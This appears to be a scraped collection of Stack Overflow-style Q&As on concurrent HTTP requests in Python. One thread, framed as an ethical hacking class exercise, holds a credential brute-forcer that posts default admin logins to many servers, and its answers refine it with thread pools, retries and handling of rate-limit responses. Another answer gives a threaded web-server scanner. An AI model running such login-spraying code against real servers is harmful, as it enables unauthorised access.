I'm trying to take a list of items and check for their status change based on certain processing by the API. The list will be manually populated and can vary in size up to several thousand items.
I'm trying to write a script that makes multiple simultaneous connections to the API to keep checking for the status change. For each item, once the status changes, the attempts to check must stop. Based on reading other posts on Stack Overflow (specifically, What is the fastest way to send 100,000 HTTP requests in Python?), I've come up with the following code. But the script always stops after processing the list once. What am I doing wrong?
An additional issue I'm facing is that the KeyboardInterrupt handler never fires (I'm trying with Ctrl+C, but it does not kill the script).
from urlparse import urlparse
from threading import Thread
import httplib, sys
from Queue import Queue

requestURLBase = "https://example.com/api"
apiKey = "123456"

concurrent = 200
keepTrying = 1

def doWork():
    while keepTrying == 1:
        url = q.get()
        status, body, url = checkStatus(url)
        checkResult(status, body, url)
        q.task_done()

def checkStatus(ourl):
    try:
        url = urlparse(ourl)
        conn = httplib.HTTPConnection(requestURLBase)
        conn.request("GET", url.path)
        res = conn.getresponse()
        respBody = res.read()
        conn.close()
        return res.status, respBody, ourl # Status can be 210 for error or 300 for successful API response
    except:
        print "ErrorBlock"
        print res.read()
        conn.close()
        return "error", "error", ourl

def checkResult(status, body, url):
    if "unavailable" not in body:
        print status, body, url
        keepTrying = 1
    else:
        keepTrying = 0

q = Queue(concurrent * 2)
for i in range(concurrent):
    t = Thread(target=doWork)
    t.daemon = True
    t.start()
try:
    for value in open('valuelist.txt'):
        fullUrl = requestURLBase + "?key=" + apiKey + "&value=" + value.strip() + "&years="
        print fullUrl
        q.put(fullUrl)
    q.join()
except KeyboardInterrupt:
    sys.exit(1)
I'm new to Python, so there could be syntax errors as well... I'm definitely not familiar with multithreading, so perhaps I'm doing something else wrong too.
In the code, the list is only read once. It should be something like:
try:
    while True:
        for value in open('valuelist.txt'):
            fullUrl = requestURLBase + "?key=" + apiKey + "&value=" + value.strip() + "&years="
            print fullUrl
            q.put(fullUrl)
        q.join()
For the interrupt issue, remove the bare except line in checkStatus or change it to except Exception. A bare except catches all exceptions, including KeyboardInterrupt and SystemExit (which is what sys.exit raises), and stops the Python process from terminating.
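A small illustrative sketch of why this matters: SystemExit and KeyboardInterrupt derive from BaseException, not Exception, so a bare except swallows them while except Exception lets them propagate.

```python
import sys

def swallow_all():
    try:
        sys.exit(1)    # raises SystemExit
    except:            # bare except catches even SystemExit
        return "swallowed"

def swallow_exceptions_only():
    try:
        sys.exit(1)
    except Exception:  # SystemExit is not an Exception subclass, so it escapes
        return "swallowed"

print(swallow_all())   # prints swallowed
try:
    swallow_exceptions_only()
except SystemExit:
    print("SystemExit propagated")
```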
If I may make a couple of general comments, though:
Threading is not a good fit for such high concurrency.
Creating a new connection for every request is inefficient.
What I would suggest is
Use gevent for asynchronous network I/O
Pre-allocate a queue of connections same size as concurrency number and have checkStatus grab a connection object when it needs to make a call. That way the connections stay alive, get reused and there is no overhead in creating and destroying them and the increased memory use that goes with it.
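To illustrate the pre-allocated pool idea, here is a minimal sketch that borrows and returns connection objects through a Queue; FakeConnection is a stand-in for a real connection class, used here only so the example is self-contained.

```python
import queue
import threading

CONCURRENT = 4  # pool size equals the concurrency number

class FakeConnection:
    """Stand-in for a real, reusable connection object."""
    def request(self, value):
        return "status for %s" % value

# Pre-allocate the connections once, up front.
conn_pool = queue.Queue()
for _ in range(CONCURRENT):
    conn_pool.put(FakeConnection())

results = []
lock = threading.Lock()

def check_status(value):
    conn = conn_pool.get()        # borrow a live connection (blocks if none free)
    try:
        result = conn.request(value)
    finally:
        conn_pool.put(conn)       # always return it so it can be reused
    with lock:
        results.append(result)

threads = [threading.Thread(target=check_status, args=(v,)) for v in range(8)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(len(results))  # prints 8
```

Because the pool holds only CONCURRENT connections, at most that many requests are in flight at once, and no connection is ever created or destroyed inside the hot loop.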
Related
I am trying to make a brute forcer for my ethical hacking class using multiprocessing. I want it to iterate through the list of server IPs and try one login for each of them, but it prints every single IP before trying to make connections; once all the IPs have been printed, it starts trying to make connections, then prints a couple of IPs, then tries another connection, and so on.
I just want it to iterate through the list of IPs and try to connect to each one, with one process per connection and about 20 processes at a time.
import threading, requests, time, os, multiprocessing

global count2

login_list = [{"username": "admin", "password": "Password1"}]

with open('Servers.txt') as f:
    lines = [line.rstrip() for line in f]

count = []
for number in range(len(lines)):
    count.append(number)
count2 = count

def login(n):
    try:
        url = 'http://' + lines[n] + '/api/auth'
        print(url)
        if '/#!/init/admin' in url:
            print('[~] Admin panel detected, saving url and moving to next...')
        x = requests.post(url, json=login_list)
        if x.status_code == 422:
            print('[-] Failed to connect, trying again...')
            print(n)
        if x.status_code == 403:
            print('[!] 403 Forbidden, "Access denied to resource", Possibly to many tries. Trying again in 20 seconds')
            time.sleep(20)
            print(n)
        if x.status_code == 200:
            print('\n[~] Connection successful! Login to ' + url + ' saved.\n')
            print(n)
    except:
        print('[#] No more logins to try for ' + url + ' moving to next server...')
        print('--------------')

if __name__ == "__main__":
    # creating a pool object
    p = multiprocessing.Pool()
    # map list to target function
    result = p.map(login, count2)
An example of the Servers.txt file:
83.88.223.86:9000
75.37.144.153:9000
138.244.6.184:9000
34.228.116.82:9000
125.209.107.178:9000
33.9.12.53:9000
Those are not real IP addresses.
I think you're confused about how the multiprocessing map function passes values to the relevant process. Perhaps this will make matters clearer:
from multiprocessing import Pool
import requests
import sys
from requests.exceptions import HTTPError, ConnectionError

IPLIST = ['83.88.223.86:9000',
          '75.37.144.153:9000',
          '138.244.6.184:9000',
          '34.228.116.82:9000',
          '125.209.107.178:9000',
          '33.9.12.53:9000',
          'www.google.com']

PARAMS = {'username': 'admin', 'password': 'passw0rd'}

def err(msg):
    print(msg, file=sys.stderr)

def process(ip):
    with requests.Session() as session:
        url = f'http://{ip}/api/auth'
        try:
            (r := session.post(url, json=PARAMS, timeout=1)).raise_for_status()
        except ConnectionError:
            err(f'Unable to connect to {url}')
        except HTTPError:
            err(f'HTTP {r.status_code} for {url}')
        except Exception as e:
            err(f'Unexpected exception {e}')

def main():
    with Pool() as pool:
        pool.map(process, IPLIST)

if __name__ == '__main__':
    main()
Additional notes: You probably want to specify a timeout; otherwise, unreachable addresses will take a long time to process due to default retries. Also review the exception handling.
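To see the effect of a timeout using only the standard library (the address below is just a typically non-routable example, not one of the servers above):

```python
import socket
import time

start = time.monotonic()
try:
    # 10.255.255.1 is usually non-routable; without a timeout the OS default
    # connect wait can be over a minute, but timeout=0.5 caps it.
    socket.create_connection(("10.255.255.1", 9000), timeout=0.5)
except OSError:
    pass  # timed out or unreachable, as expected
elapsed = time.monotonic() - start
print(elapsed < 5)
```

The same principle applies to requests: pass timeout= to session.post so a dead host fails fast instead of stalling its worker.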
The first thing I would mention is that this is a job best suited for multithreading, since login is mostly waiting for network requests to complete, and it is far more efficient to create threads than processes. In fact, you should create a thread pool whose size equals the number of URLs you will be posting to, up to a maximum of, say, 1,000 (and you would not want to create a multiprocessing pool of that size).
Second, when you are doing multiprocessing or multithreading your worker function, login in this case, is processing a single element of the iterable that is being passed to the map function. I think you get that. But instead of passing to map the list of servers you are passing a list of numbers (which are indices) and then login is using that index to get the information from the lines list. That is rather indirect. Also, the way you build the list of indices could have been simplified with one line: count2 = list(range(len(lines))) or really just count2 = range(len(lines)) (you don't need a list).
Third, in your code you say that you are retrying certain errors but there is actually no logic to do so.
import requests
from multiprocessing.pool import ThreadPool
from functools import partial
import time

# This must be a dict, not a list:
login_params = {"username": "admin", "password": "Password1"}

with open('Servers.txt') as f:
    servers = [line.rstrip() for line in f]

def login(session, server):
    url = f'http://{server}/api/auth'
    print(url)
    if '/#!/init/admin' in url:
        print(f'[~] Admin panel detected, saving {url} and moving to next...')
        # To move on to the next, you simply return
        # because you are through with this URL:
        return
    try:
        for retry_count in range(1, 4):  # will retry certain errors up to 3 times:
            r = session.post(url, json=login_params)
            if retry_count == 3:
                # This was the last try:
                break
            if r.status_code == 422:
                print(f'[-] Failed to connect to {url}, trying again...')
            elif r.status_code == 403:
                print(f'[!] 403 Forbidden, "Access denied to resource", possibly too many tries. Trying {url} again in 20 seconds')
                time.sleep(20)
            else:
                break  # not something we retry
        r.raise_for_status()  # test status code
    except Exception as e:
        print('Got exception:', e)
    else:
        print(f'\n[~] Connection successful! Login to {url} saved.\n')

if __name__ == "__main__":
    # creating a pool object
    with ThreadPool(min(len(servers), 1000)) as pool, \
            requests.Session() as session:
        # map will return a list of None since `login` returns None implicitly:
        pool.map(partial(login, session), servers)
Recently I have been working to integrate Google Directory, Calendar, and Classroom to work seamlessly with the existing services that we have.
I need to loop through 1500 objects and make requests to Google to check something. Responses from Google do take a while, so I want to wait on each request to complete while at the same time running other checks.
def __get_students_of_course(self, course_id, index_in_course_list, page=None):
    print("getting students from gclass ", course_id, "page ", page)
    # self.__check_request_count(10)
    try:
        response = self.class_service.courses().students().list(courseId=course_id,
                                                                pageToken=page).execute()
        # the response must come back before proceeding to the next checks
        course_to_add_to = self.course_list_gsuite[index_in_course_list]
        current_students = course_to_add_to["students"]
        for student in response["students"]:
            current_students.append(student["profile"]["emailAddress"])
        self.course_list_gsuite[index_in_course_list] = course_to_add_to
        try:
            if "nextPageToken" in response:
                self.__get_students_of_course(
                    course_id, index_in_course_list, page=response["nextPageToken"])
            else:
                return
        except Exception as e:
            print(e)
            return
    except Exception as e:
        print(e)
And I run that function from another function
def __check_course_state(self, course):
    course_to_create = {...}
    try:
        g_course = next(
            (g_course for g_course in self.course_list_gsuite if g_course["name"] == course_to_create["name"]), None)
        if g_course != None:
            index_2 = None
            for index_1, class_name in enumerate(self.course_list_gsuite):
                if class_name["name"] == course_to_create["name"]:
                    index_2 = index_1
            self.__get_students_of_course(
                g_course["id"], index_2)  # need to wait here
            students_enrolled_in_g_class = self.course_list_gsuite[index_2]["students"]
            request = requests.post()  # need to wait here
            students_in_iras = request.json()
            students_to_add_in_g_class = []
            for student in students["data"]:
                try:
                    pass
                except Exception as e:
                    print(e)
                students_to_add_in_g_class.append(
                    student["studentId"])
            if len(students_to_add_in_g_class) != 0:
                pass
            else:
                pass
        else:
            pass
    except Exception as e:
        print(e)
I need to do these tasks for 1500 objects. They are not related to each other, so I want to move on to the next object in the loop while waiting for the other results to come back and finish.
Here is how I tried this with threads:
def create_courses(self):
    # pool = []
    counter = 0
    with concurrent.futures.ThreadPoolExecutor() as executor:
        results = executor.map(
            self.__check_course_state, self.courses[0:5])
The problem is that when I run it like this, I get multiple SSL errors and other errors. As far as I understand, since the threads themselves are running, the requests never wait to finish before moving on to the next line, so I have nothing in the request object and it throws errors. Is that right?
Any Ideas on how to approach this?
The SSL error occurs here because I was reusing the HTTP instance from the Google API client library: self.class_service is being used to send a request while waiting on another request. The best way to handle this is to create a new instance of the service for every request.
The code in my program essentially conducts 10 Python requests simultaneously and processes their output, also simultaneously. It was working for a while, but I changed something and can't work out what broke it.
The following is the calling code; it appears to freeze between lines 3 and 4, i.e. in the process of doing the multithreaded requests.
The line print("failed to close") does not print, which appears to indicate that the program never reaches the pool.close() instruction.
listoftensites = listoftensites
pool = Pool(processes=10)  # initialize a pool of 10 processes
listoftextis, listofonline = zip(*pool.map(onionrequestthreaded, listoftensites))  # use the pool to run the function on the items in the iterable
print("failed to close ")
pool.close()
# this means that no more tasks will be added to the pool
pool.join()
The function being called hangs immediately after the line print("failed in return"), which would appear to indicate that the requests do not terminate properly and return the expected values.
def onionrequestthreaded(onionurl):
    session = requests.session()
    session.proxies = {}
    session.proxies['http'] = 'socks5h://localhost:9050'
    session.proxies['https'] = 'socks5h://localhost:9050'
    onionurlforrequest = "http://" + onionurl
    # print(onionurlforrequest)
    print("failed with proxy session")
    try:
        print("failed in request")
        r = session.get(onionurlforrequest, timeout=15, allow_redirects=True)
        online = 2
        print("failed in text extraction")
        textis = r.text
    except:
        print("failed in except")
        # print("failed")
        online = 1
        textis = ""
    print("failed in return")
    return textis, online
Very confusing, but I'm probably doing something simple wrong. Please let me know if there's a solution to this, as I'm pulling my hair out.
Edit 2
Second approach. For now, I gave up on using multiple instances and configured the scrapy settings not to use concurrent requests. It's slow but stable. I opened a bounty: who can help make this work concurrently? If I configure scrapy to run concurrently, I get segmentation faults.
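For reference, disabling concurrency in scrapy is a one-line settings change; CONCURRENT_REQUESTS is the relevant built-in setting (a sketch of the settings.py fragment):

```python
# settings.py: process one request at a time (slow but stable)
CONCURRENT_REQUESTS = 1
```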
class WebkitDownloader(object):
    def __init__(self):
        os.environ["DISPLAY"] = ":99"
        self.proxyAddress = "a:b#" + PROXY_DEFAULT_HOST + ":" + str(PROXY_DEFAULT_PORT)

    def process_response(self, request, response, spider):
        self.request = request
        self.response = response
        if 'cached' not in response.flags:
            webkitBrowser = webkit.WebkitBrowser(proxy=self.proxyAddress, gui=False, timeout=0.5, delay=0.5, forbidden_extensions=['js','css','swf','pdf','doc','xls','ods','odt'])
            # print "added to queue: " + str(self.counter)
            webkitBrowser.get(html=response.body, num_retries=0)
            html = webkitBrowser.current_html()
            respcls = responsetypes.from_args(headers=response.headers, url=response.url)
            kwargs = dict(cls=respcls, body=killgremlins(html))
            response = response.replace(**kwargs)
            webkitBrowser.setPage(None)
            del webkitBrowser
        return response
Edit:
I tried to answer my own question in the meantime and implemented a queue, but for some reason it does not run asynchronously. Basically, when webkitBrowser.get(html=response.body, num_retries=0) is busy, scrapy is blocked until the method finishes. New requests are not assigned to the remaining free instances in self.queue.
Can anyone please point me into right direction to make this work?
class WebkitDownloader(object):
    def __init__(self):
        proxyAddress = "http://" + PROXY_DEFAULT_HOST + ":" + str(PROXY_DEFAULT_PORT)
        self.queue = list()
        for i in range(8):
            self.queue.append(webkit.WebkitBrowser(proxy=proxyAddress, gui=True, timeout=0.5, delay=5.5, forbidden_extensions=['js','css','swf','pdf','doc','xls','ods','odt']))

    def process_response(self, request, response, spider):
        i = 0
        for webkitBrowser in self.queue:
            i += 1
            if webkitBrowser.status == "WAITING":
                break
        webkitBrowser = self.queue[i]
        if webkitBrowser.status == "WAITING":
            # load webpage
            print "added to queue: " + str(i)
            webkitBrowser.get(html=response.body, num_retries=0)
            webkitBrowser.scrapyResponse = response
        while webkitBrowser.status == "PROCESSING":
            print "waiting for queue: " + str(i)
        if webkitBrowser.status == "DONE":
            print "fetched from queue: " + str(i)
            # response = webkitBrowser.scrapyResponse
            html = webkitBrowser.current_html()
            respcls = responsetypes.from_args(headers=response.headers, url=response.url)
            kwargs = dict(cls=respcls, body=killgremlins(html))
            # response = response.replace(**kwargs)
            webkitBrowser.status = "WAITING"
        return response
I am using WebKit in a scrapy middleware to render JavaScript. Currently, scrapy is configured to process 1 request at a time (no concurrency).
I'd like to use concurrency (e.g. 8 requests at a time) but then I need to make sure that 8 instances of WebkitBrowser() receive requests based on their individual processing state (a fresh request as soon as WebkitBrowser.get() is done and ready to receive the next request)
How would I achieve that with Python? This is my current middleware:
class WebkitDownloader(object):
    def __init__(self):
        proxyAddress = "http://" + PROXY_DEFAULT_HOST + ":" + str(PROXY_DEFAULT_PORT)
        self.w = webkit.WebkitBrowser(proxy=proxyAddress, gui=True, timeout=0.5, delay=0.5, forbidden_extensions=['js','css','swf','pdf','doc','xls','ods','odt'])

    def process_response(self, request, response, spider):
        if not ".pdf" in response.url:
            # load webpage
            self.w.get(html=response.body, num_retries=0)
            html = self.w.current_html()
            respcls = responsetypes.from_args(headers=response.headers, url=response.url)
            kwargs = dict(cls=respcls, body=killgremlins(html))
            response = response.replace(**kwargs)
        return response
I don't follow everything in your question because I don't know scrapy and I don't understand what would cause the segfault, but I think I can address one question: why is scrapy blocked when webkitBrowser.get is busy?
I don't see anything in your "queue" example that would give you the possibility of parallelism. Normally, one would use either the threading or multiprocessing module so that multiple things can run "in parallel". Instead of simply calling webkitBrowser.get, I suspect that you may want to run it in a thread. Retrieving web pages is a case where python threading should work reasonably well. Python can't do two CPU-intensive tasks simultaneously (due to the GIL), but it can wait for responses from web servers in parallel.
Here's a recent SO Q/A with example code that might help.
Here's an idea of how to get you started. Create a Queue. Define a function which takes this queue as an argument, gets the web page, and puts the response in the queue. In the main program, enter a while True: loop after spawning all the get threads: check the queue and process the next entry, or time.sleep(.1) if it's empty.
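A minimal sketch of that pattern; the fetch function here is a stand-in for a real page retrieval (e.g. webkitBrowser.get or urllib), so the example is self-contained.

```python
import queue
import threading
import time

results = queue.Queue()

def fetch(url, out_q):
    # stand-in for a real page fetch; a real version would do the
    # network/rendering work here, then put the result on the queue
    out_q.put((url, "<html>%s</html>" % url))

urls = ["http://a", "http://b", "http://c"]

# spawn all the get threads
threads = [threading.Thread(target=fetch, args=(u, results)) for u in urls]
for t in threads:
    t.start()

# main loop: process entries as they arrive, idle briefly when empty
processed = []
while len(processed) < len(urls):
    try:
        url, body = results.get(timeout=0.1)
        processed.append(url)
    except queue.Empty:
        time.sleep(0.1)  # nothing ready yet

print(len(processed))  # prints 3
```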
I am aware this is an old question, but I had a similar question and hope the information I stumbled upon helps others:
1. If scrapyjs + splash works for you (given you are using a webkit browser, it likely does, as splash is webkit-based), it is probably the easiest solution.
2. If 1 does not work, you may be able to run multiple spiders at the same time with scrapyd, or do multiprocessing with scrapy.
3. Depending on whether your browser render is primarily waiting (for pages to render), IO-intensive, or CPU-intensive, you may want to use non-blocking sleep with twisted, multithreading, or multiprocessing. For the latter, the value of sticking with scrapy diminishes and you may want to hack a simple scraper (e.g. the web crawler authored by A. Jesse Jiryu Davis and Guido van Rossum: code and document) or create your own.
Learning Python here. I want to check if anybody is running a web server on my local network using this code, but it gives me a lot of errors in the console.
#!/usr/bin/env python
import httplib

last = 1
while last <> 255:
    url = "10.1.1." + "last"
    connection = httplib.HTTPConnection("url", 80)
    connection.request("GET", "/")
    response = connection.getresponse()
    print (response.status)
    last = last + 1
I do suggest changing the while loop to the more idiomatic for loop, and handling exceptions:
#!/usr/bin/env python
import httplib
import socket

for i in range(1, 256):
    try:
        url = "10.1.1.%d" % i
        connection = httplib.HTTPConnection(url, 80)
        connection.request("GET", "/")
        response = connection.getresponse()
        print url + ":", response.status
    except socket.error:
        print url + ":", "error!"
To see how to add a timeout to this, so it doesn't take so long to check each server, see here.
as pointed out, you have some basic quotation issues. but more fundamentally:
1. you're not using Pythonesque constructs to handle things but you're coding them as simple imperative code. that's fine, of course, but below are examples of funner (and better) ways to express things
2. you need to explicitly set timeouts or it'll take forever
3. you need to multithread or it'll take forever
4. you need to handle various common exception types or your code will crash: connections will fail (including time out) under numerous conditions against real web servers
5. 10.1.1.* is only one possible set of "local" servers. RFC 1918 spells out that the "local" ranges are 10.0.0.0 - 10.255.255.255, 172.16.0.0 - 172.31.255.255, and 192.168.0.0 - 192.168.255.255. the problem of generic detection of responders in your "local" network is a hard one
6. web servers (especially local ones) often run on other ports than 80 (notably on 8000, 8001, or 8080)
7. the complexity of general web servers, dns, etc is such that you can get various timeout behaviors at different times (and affected by recent operations)
below, some sample code to get you started, that pretty much addresses all of the above problems except (5), which i'll assume is (well) beyond the scope of the question.
btw i'm printing the size of the returned web page, since it's a simple "signature" of what the page is. the sample IPs return various Yahoo assets.
import urllib
import threading
import socket

def t_run(thread_list, chunks):
    t_count = len(thread_list)
    print "Running %s jobs in groups of %s threads" % (t_count, chunks)
    for x in range(t_count / chunks + 1):
        i = x * chunks
        i_c = min(i + chunks, t_count)
        c = len([t.start() for t in thread_list[i:i_c]])
        print "Started %s threads for jobs %s...%s" % (c, i, i_c - 1)
        c = len([t.join() for t in thread_list[i:i_c]])
        print "Finished %s threads for job index %s" % (c, i)

def url_scan(ip_base, timeout=5):
    socket.setdefaulttimeout(timeout)
    def f(url):
        # print "-- Trying (%s)" % url
        try:
            # the print will only complete if there's a server there
            r = urllib.urlopen(url)
            if r:
                print "## (%s) got %s bytes" % (url, len(r.read()))
            else:
                print "## (%s) failed to connect" % url
        except IOError, msg:
            # these are just the common cases
            if str(msg) == "[Errno socket error] timed out":
                return
            if str(msg) == "[Errno socket error] (10061, 'Connection refused')":
                return
            print "## (%s) got error '%s'" % (url, msg)
    # you might want 8000 and 8001, too
    return [threading.Thread(target=f,
                             args=("http://" + ip_base + str(x) + ":" + str(p),))
            for x in range(255) for p in [80, 8080]]

# run them (increase chunk size depending on your memory)
# also, try different timeouts
t_run(url_scan("209.131.36."), 100)
t_run(url_scan("209.131.36.", 30), 100)
Remove the quotes from the variable names last and url. Python is interpreting them as strings rather than variables. Try this:
#!/usr/bin/env python
import httplib

last = 1
while last <> 255:
    url = "10.1.1.%d" % last
    connection = httplib.HTTPConnection(url, 80)
    connection.request("GET", "/")
    response = connection.getresponse()
    print (response.status)
    last = last + 1
You're trying to connect to a URL that is literally the string 'url': that's what the quotes you're using in
connection = httplib.HTTPConnection("url", 80)
mean. Once you remedy that (by removing those quotes), you'll be trying to connect to "10.1.1.last", given the quotes in the previous line. Set that line to
url = "10.1.1." + str(last)
and it could work!-)
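To see the difference the quotes make (the value 7 is just illustrative):

```python
last = 7
print("10.1.1." + "last")     # prints 10.1.1.last - the literal string, i.e. the bug
print("10.1.1." + str(last))  # prints 10.1.1.7 - uses the variable's value
print("10.1.1.%d" % last)     # prints 10.1.1.7 - format-string equivalent
```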